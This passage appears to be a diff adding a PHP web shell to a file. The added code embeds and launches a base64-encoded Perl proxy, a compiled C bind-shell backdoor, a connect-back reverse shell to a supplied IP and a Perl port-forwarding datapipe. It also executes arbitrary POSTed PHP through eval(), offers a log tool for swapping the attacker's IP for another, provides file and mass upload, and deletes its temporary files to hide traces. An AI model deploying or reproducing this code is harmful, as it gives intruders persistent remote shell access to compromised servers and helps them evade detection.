aW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("/tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru(".nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("/tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru(".nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêğûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïğåğâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïğîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïğîøåë óñïåøíî, çàêğûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ğåäèğåêò íà \$o->{'tohost'}, ïîğò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïğåğâàí ğåäèğåêò íà %s, ïîğò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïğåğâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëş÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïğè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïğîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/down_sys_scripts.php?get=nst_online_md5_cd.rar>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=this size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$this=$_POST['this'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
